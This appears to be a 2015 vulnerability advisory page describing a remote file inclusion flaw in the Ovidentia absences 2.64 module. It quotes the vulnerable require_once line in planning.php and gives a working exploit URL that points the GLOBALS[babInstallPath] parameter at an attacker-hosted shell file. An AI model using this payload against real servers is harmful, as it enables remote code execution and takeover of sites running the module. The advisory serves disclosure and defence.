Ovidentia absences 2.64 Remote File Inclusion

2015.12.16
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability # Author: bd0rk # eMail: bd0rk[at]hackermail.com # Tested on: Ubuntu-Linux # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880 Proof-of-Concept: /absences-2-64/programs/planning.php line 26 --------------------------------------------------------------- require_once $GLOBALS['babInstallPath'].'utilit/defines.php'; --------------------------------------------------------------- [+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt? Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once. So an attacker can use this to execute some php-shellcode for example. ### The 27 years old, german hacker bd0rk ###

References:

http://cxsecurity.com/issue/WLB-2015120160


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top